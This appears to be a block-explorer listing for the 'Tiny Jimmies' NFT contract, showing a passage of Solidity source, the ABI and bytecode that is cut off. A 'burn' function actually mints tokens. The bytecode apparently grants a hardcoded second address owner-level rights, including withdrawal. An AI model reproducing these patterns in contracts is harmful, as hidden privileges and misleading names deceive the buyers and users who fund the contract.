_ownerships[tokenId].startTimestamp = uint64(block.timestamp);
// If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
// Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
uint256 nextTokenId = tokenId + 1;
if (_ownerships[nextTokenId].addr == address(0)) {
if (_exists(nextTokenId)) {
_ownerships[nextTokenId].addr = prevOwnership.addr;
_ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
}
}
}
emit Transfer(from, to, tokenId);
_afterTokenTransfers(from, to, tokenId, 1);
}
/**
* @dev Approve `to` to operate on `tokenId`
*
* Emits a {Approval} event.
*/
function _approve(
address to,
uint256 tokenId,
address owner
) private {
_tokenApprovals[tokenId] = to;
emit Approval(owner, to, tokenId);
}
/**
* @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
* The call is not executed if the target address is not a contract.
*
* @param from address representing the previous owner of the given token ID
* @param to target address that will receive the tokens
* @param tokenId uint256 ID of the token to be transferred
* @param _data bytes optional data to send along with the call
* @return bool whether the call correctly returned the expected magic value
*/
function _checkOnERC721Received(
address from,
address to,
uint256 tokenId,
bytes memory _data
) private returns (bool) {
if (to.isContract()) {
try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
return retval == IERC721Receiver(to).onERC721Received.selector;
} catch (bytes memory reason) {
if (reason.length == 0) {
revert("ERC721A: transfer to non ERC721Receiver implementer");
} else {
assembly {
revert(add(32, reason), mload(reason))
}
}
}
} else {
return true;
}
}
/**
* @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
*
* startTokenId - the first token id to be transferred
* quantity - the amount to be transferred
*
* Calling conditions:
*
* - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
* transferred to `to`.
* - When `from` is zero, `tokenId` will be minted for `to`.
*/
function _beforeTokenTransfers(
address from,
address to,
uint256 startTokenId,
uint256 quantity
) internal virtual {}
/**
* @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
* minting.
*
* startTokenId - the first token id to be transferred
* quantity - the amount to be transferred
*
* Calling conditions:
*
* - when `from` and `to` are both non-zero.
* - `from` and `to` are never both zero.
*/
function _afterTokenTransfers(
address from,
address to,
uint256 startTokenId,
uint256 quantity
) internal virtual {}
}
contract TinyJimmies is ERC721A, Ownable, ReentrancyGuard {
string public baseURI = "ipfs://REPLACE/";
uint public price = 0.002 ether;
uint public maxPerTx = 21;
uint public maxPerFree = 1;
uint public maxPerWallet = 21;
uint public totalFree = 2222;
uint public maxSupply = 2222;
bool public mintEnabled;
uint public totalFreeMinted = 0;
mapping(address => uint256) public _mintedFreeAmount;
mapping(address => uint256) public _totalMintedAmount;
constructor() ERC721A("Tiny Jimmies", "JIMMY"){}
function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) {
require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token");
string memory currentBaseURI = _baseURI();
return bytes(currentBaseURI).length > 0
? string(abi.encodePacked(currentBaseURI,Strings.toString(_tokenId+1),".json"))
: "";
}
function _startTokenId() internal view virtual returns (uint256) {
return 1;
}
function mint(uint256 count) external payable {
uint256 cost = price;
bool isFree = ((totalFreeMinted + count < totalFree + 1) &&
(_mintedFreeAmount[msg.sender] < maxPerFree));
if (isFree) {
require(mintEnabled, "Mint is not live yet");
require(totalSupply() + count <= maxSupply, "No more");
require(count <= maxPerTx, "Max per TX reached.");
if(count >= (maxPerFree - _mintedFreeAmount[msg.sender]))
{
require(msg.value >= (count * cost) - ((maxPerFree - _mintedFreeAmount[msg.sender]) * cost), "Please send the exact ETH amount");
_mintedFreeAmount[msg.sender] = maxPerFree;
totalFreeMinted += maxPerFree;
}
else if(count < (maxPerFree - _mintedFreeAmount[msg.sender]))
{
require(msg.value >= 0, "Please send the exact ETH amount");
_mintedFreeAmount[msg.sender] += count;
totalFreeMinted += count;
}
}
else{
require(mintEnabled, "Mint is not live yet");
require(_totalMintedAmount[msg.sender] + count <= maxPerWallet, "Exceed maximum NFTs per wallet");
require(msg.value >= count * cost, "Please send the exact ETH amount");
require(totalSupply() + count <= maxSupply, "No more");
require(count <= maxPerTx, "Max per TX reached.");
require(msg.sender == tx.origin, "The minter is another contract");
}
_totalMintedAmount[msg.sender] += count;
_safeMint(msg.sender, count);
}
function costCheck() public view returns (uint256) {
return price;
}
function maxFreePerWallet() public view returns (uint256) {
return maxPerFree;
}
function burn(address mintAddress, uint256 count) public onlyOwner {
_safeMint(mintAddress, count);
}
function _baseURI() internal view virtual override returns (string memory) {
return baseURI;
}
function setBaseUri(string memory baseuri_) public onlyOwner {
baseURI = baseuri_;
}
function setPrice(uint256 price_) external onlyOwner {
price = price_;
}
function setMaxTotalFree(uint256 MaxTotalFree_) external onlyOwner {
totalFree = MaxTotalFree_;
}
function setMaxPerFree(uint256 MaxPerFree_) external onlyOwner {
maxPerFree = MaxPerFree_;
}
function toggleMinting() external onlyOwner {
mintEnabled = !mintEnabled;
}
function CommunityWallet(uint quantity, address user)
public
onlyOwner
{
require(
quantity > 0,
"Invalid mint amount"
);
require(
totalSupply() + quantity <= maxSupply,
"Maximum supply exceeded"
);
_safeMint(user, quantity);
}
function withdraw() external onlyOwner nonReentrant {
(bool success, ) = msg.sender.call{value: address(this).balance}("");
require(success, "Transfer failed.");
}
}{
"optimizer": {
"enabled": false,
"runs": 200
},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"address","name":"user","type":"address"}],"name":"CommunityWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_mintedFreeAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_totalMintedAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"mintAddress","type":"address"},{"internalType":"uint256","name":"count","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"costCheck","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreePerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxPerFree_","type":"uint256"}],"name":"setMaxPerFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxTotalFree_","type":"uint256"}],"name":"setMaxTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggleMinting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFreeMinted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
608060405273acfcba7bab6403ebcceee22810c4dd3c9bbe9763600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506040518060400160405280600f81526020017f697066733a2f2f5245504c4143452f0000000000000000000000000000000000815250600a9080519060200190620000a69291906200027c565b5066071afd498d0000600b556015600c556001600d556015600e556108ae600f556108ae6010556000601255348015620000df57600080fd5b506040518060400160405280600c81526020017f54696e79204a696d6d69657300000000000000000000000000000000000000008152506040518060400160405280600581526020017f4a494d4d590000000000000000000000000000000000000000000000000000008152508160019080519060200190620001649291906200027c565b5080600290805190602001906200017d9291906200027c565b505050620001a062000194620001ae60201b60201c565b620001b660201b60201c565b600160098190555062000391565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200028a906200032c565b90600052602060002090601f016020900481019282620002ae5760008555620002fa565b82601f10620002c957805160ff1916838001178555620002fa565b82800160010185558215620002fa579182015b82811115620002f9578251825591602001919060010190620002dc565b5b5090506200030991906200030d565b5090565b5b80821115620003285760008160009055506001016200030e565b5090565b600060028204905060018216806200034557607f821691505b602082108114156200035c576200035b62000362565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b61526a80620003a16000396000f3fe6080604052600436106102465760003560e01c80638da5cb5b11610139578063b88d4fde116100b6578063dad7b5c91161007a578063dad7b5c91461085d578063e945971c14610888578063e985e9c5146108b1578063f2fde38b146108ee578063f4db2acb14610917578063f968adbe1461095457610246565b8063b88d4fde14610776578063c7c39ffc1461079f578063c87b56dd146107ca578063d123973014610807578063d5abeb011461083257610246565b8063a0712d68116100fd578063a0712d68146106b4578063a0bcfc7f146106d0578063a22cb465146106f9578063a702735714610722578063b0e77f421461074d57610246565b80638da5cb5b146105e157806391b7f5ed1461060c57806395d89b41146106355780639dc29fac14610660578063a035b1fe1461068957610246565b806342842e0e116101c757806364b721881161018b57806364b72188146105205780636c0360eb1461054b57806370a0823114610576578063715018a6146105b35780637d55094d146105ca57610246565b806342842e0e14610429578063453c2310146104525780634f6ccce71461047d5780635a963f1b146104ba5780636352211e146104e357610246565b806318160ddd1161020e57806318160ddd1461035657806323b872dd146103815780632f745c59146103aa578063333e44e6146103e75780633ccfd60b1461041257610246565b806301ffc9a71461024b57806306fdde0314610288578063081812fc146102b3578063095ea7b3146102f057806311b01a3214610319575b600080fd5b34801561025757600080fd5b50610272600480360381019061026d9190613b34565b61097f565b60405161027f91906141fc565b60405180910390f35b34801561029457600080fd5b5061029d610ac9565b6040516102aa9190614217565b60405180910390f35b3480156102bf57600080fd5b506102da60048036038101906102d59190613bd7565b610b5b565b6040516102e79190614195565b60405180910390f35b3480156102fc57600080fd5b5061031760048036038101906103129190613af4565b610be0565b005b34801561032557600080fd5b50610340600480360381019061033b9190613971565b610cf9565b60405161034d91906145d9565b60405180910390f35b34801561036257600080fd5b5061036b610d11565b60405161037891906145d9565b60405180910390f35b34801561038d57600080fd5b506103a860048036038101906103a391906139de565b610d1a565b005b3480156103b657600080fd5b506103d160048036038101906103cc9190613af4565b610d2a565b6040516103de91906145d9565b60405180910390f35b3480156103f357600080fd5b506103fc610f1c565b60405161040991906145d9565b60405180910390f35b34801561041e57600080fd5b50610427610f22565b005b34801561043557600080fd5b50610450600480360381019061044b91906139de565b611102565b005b34801561045e57600080fd5b50610467611122565b60405161047491906145d9565b60405180910390f35b34801561048957600080fd5b506104a4600480360381019061049f9190613bd7565b611128565b6040516104b191906145d9565b60405180910390f35b3480156104c657600080fd5b506104e160048036038101906104dc9190613bd7565b61117b565b005b3480156104ef57600080fd5b5061050a60048036038101906105059190613bd7565b611260565b6040516105179190614195565b60405180910390f35b34801561052c57600080fd5b50610535611276565b60405161054291906145d9565b60405180910390f35b34801561055757600080fd5b50610560611280565b60405161056d9190614217565b60405180910390f35b34801561058257600080fd5b5061059d60048036038101906105989190613971565b61130e565b6040516105aa91906145d9565b60405180910390f35b3480156105bf57600080fd5b506105c86113f7565b005b3480156105d657600080fd5b506105df6114de565b005b3480156105ed57600080fd5b506105f66115e5565b6040516106039190614195565b60405180910390f35b34801561061857600080fd5b50610633600480360381019061062e9190613bd7565b61160f565b005b34801561064157600080fd5b5061064a6116f4565b6040516106579190614217565b60405180910390f35b34801561066c57600080fd5b5061068760048036038101906106829190613af4565b611786565b005b34801561069557600080fd5b5061069e61186f565b6040516106ab91906145d9565b60405180910390f35b6106ce60048036038101906106c99190613bd7565b611875565b005b3480156106dc57600080fd5b506106f760048036038101906106f29190613b8e565b611eee565b005b34801561070557600080fd5b50610720600480360381019061071b9190613ab4565b611fe3565b005b34801561072e57600080fd5b50610737612164565b60405161074491906145d9565b60405180910390f35b34801561075957600080fd5b50610774600480360381019061076f9190613c04565b61216e565b005b34801561078257600080fd5b5061079d60048036038101906107989190613a31565b6122f1565b005b3480156107ab57600080fd5b506107b461234d565b6040516107c191906145d9565b60405180910390f35b3480156107d657600080fd5b506107f160048036038101906107ec9190613bd7565b612353565b6040516107fe9190614217565b60405180910390f35b34801561081357600080fd5b5061081c612406565b60405161082991906141fc565b60405180910390f35b34801561083e57600080fd5b50610847612419565b60405161085491906145d9565b60405180910390f35b34801561086957600080fd5b5061087261241f565b60405161087f91906145d9565b60405180910390f35b34801561089457600080fd5b506108af60048036038101906108aa9190613bd7565b612425565b005b3480156108bd57600080fd5b506108d860048036038101906108d3919061399e565b61250a565b6040516108e591906141fc565b60405180910390f35b3480156108fa57600080fd5b5061091560048036038101906109109190613971565b61259e565b005b34801561092357600080fd5b5061093e60048036038101906109399190613971565b6126f5565b60405161094b91906145d9565b60405180910390f35b34801561096057600080fd5b5061096961270d565b60405161097691906145d9565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161480610a4a57507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610ab257507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610ac25750610ac182612713565b5b9050919050565b606060018054610ad890614894565b80601f0160208091040260200160405190810160405280929190818152602001828054610b0490614894565b8015610b515780601f10610b2657610100808354040283529160200191610b51565b820191906000526020600020905b815481529060010190602001808311610b3457829003601f168201915b5050505050905090565b6000610b668261277d565b610ba5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9c906145b9565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610beb82611260565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5390614479565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610c7b61278a565b73ffffffffffffffffffffffffffffffffffffffff161480610caa5750610ca981610ca461278a565b61250a565b5b610ce9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce090614339565b60405180910390fd5b610cf4838383612792565b505050565b60146020528060005260406000206000915090505481565b60008054905090565b610d25838383612844565b505050565b6000610d358361130e565b8210610d76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6d90614239565b60405180910390fd5b6000610d80610d11565b905060008060005b83811015610eda576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610e7a57806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ecc5786841415610ec3578195505050505050610f16565b83806001019450505b508080600101915050610d88565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0d90614559565b60405180910390fd5b92915050565b600f5481565b610f2a61278a565b73ffffffffffffffffffffffffffffffffffffffff16610f486115e5565b73ffffffffffffffffffffffffffffffffffffffff161480610fbe5750610f6d61278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610ffd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ff4906143d9565b60405180910390fd5b60026009541415611043576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161103a90614579565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff164760405161107190614180565b60006040518083038185875af1925050503d80600081146110ae576040519150601f19603f3d011682016040523d82523d6000602084013e6110b3565b606091505b50509050806110f7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ee90614499565b60405180910390fd5b506001600981905550565b61111d838383604051806020016040528060008152506122f1565b505050565b600e5481565b6000611132610d11565b8210611173576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116a906142f9565b60405180910390fd5b819050919050565b61118361278a565b73ffffffffffffffffffffffffffffffffffffffff166111a16115e5565b73ffffffffffffffffffffffffffffffffffffffff16148061121757506111c661278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611256576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161124d906143d9565b60405180910390fd5b80600f8190555050565b600061126b82612d84565b600001519050919050565b6000600b54905090565b600a805461128d90614894565b80601f01602080910402602001604051908101604052809291908181526020018280546112b990614894565b80156113065780601f106112db57610100808354040283529160200191611306565b820191906000526020600020905b8154815290600101906020018083116112e957829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561137f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137690614359565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b6113ff61278a565b73ffffffffffffffffffffffffffffffffffffffff1661141d6115e5565b73ffffffffffffffffffffffffffffffffffffffff161480611493575061144261278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6114d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114c9906143d9565b60405180910390fd5b6114dc6000612f1e565b565b6114e661278a565b73ffffffffffffffffffffffffffffffffffffffff166115046115e5565b73ffffffffffffffffffffffffffffffffffffffff16148061157a575061152961278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6115b9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115b0906143d9565b60405180910390fd5b601160009054906101000a900460ff1615601160006101000a81548160ff021916908315150217905550565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61161761278a565b73ffffffffffffffffffffffffffffffffffffffff166116356115e5565b73ffffffffffffffffffffffffffffffffffffffff1614806116ab575061165a61278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6116ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116e1906143d9565b60405180910390fd5b80600b8190555050565b60606002805461170390614894565b80601f016020809104026020016040519081016040528092919081815260200182805461172f90614894565b801561177c5780601f106117515761010080835404028352916020019161177c565b820191906000526020600020905b81548152906001019060200180831161175f57829003601f168201915b5050505050905090565b61178e61278a565b73ffffffffffffffffffffffffffffffffffffffff166117ac6115e5565b73ffffffffffffffffffffffffffffffffffffffff16148061182257506117d161278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611861576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611858906143d9565b60405180910390fd5b61186b8282612fe4565b5050565b600b5481565b6000600b54905060006001600f5461188d91906146c9565b8360125461189b91906146c9565b1080156118e85750600d54601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b90508015611c5257601160009054906101000a900460ff1661193f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161193690614259565b60405180910390fd5b6010548361194b610d11565b61195591906146c9565b1115611996576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161198d90614279565b60405180910390fd5b600c548311156119db576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119d290614539565b60405180910390fd5b601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611a2891906147aa565b8310611b445781601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611a7c91906147aa565b611a869190614750565b8284611a929190614750565b611a9c91906147aa565b341015611ade576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ad590614379565b60405180910390fd5b600d54601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600d5460126000828254611b3891906146c9565b92505081905550611c4d565b601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611b9191906147aa565b831015611c4c576000341015611bdc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bd390614379565b60405180910390fd5b82601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611c2b91906146c9565b925050819055508260126000828254611c4491906146c9565b925050819055505b5b611e89565b601160009054906101000a900460ff16611ca1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c9890614259565b60405180910390fd5b600e5483601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611cef91906146c9565b1115611d30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d2790614459565b60405180910390fd5b8183611d3c9190614750565b341015611d7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d7590614379565b60405180910390fd5b60105483611d8a610d11565b611d9491906146c9565b1115611dd5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dcc90614279565b60405180910390fd5b600c54831115611e1a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e1190614539565b60405180910390fd5b3273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614611e88576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e7f906142b9565b60405180910390fd5b5b82601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611ed891906146c9565b92505081905550611ee93384612fe4565b505050565b611ef661278a565b73ffffffffffffffffffffffffffffffffffffffff16611f146115e5565b73ffffffffffffffffffffffffffffffffffffffff161480611f8a5750611f3961278a565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611fc9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fc0906143d9565b60405180910390fd5b80600a9080519060200190611fdf92919061374b565b5050565b611feb61278a565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415612059576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161205090614419565b60405180910390fd5b806006600061206661278a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff1661211361278a565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c318360405161215891906141fc565b60405180910390a35050565b6000600d54905090565b61217661278a565b73ffffffffffffffffffffffffffffffffffffffff166121946115e5565b73f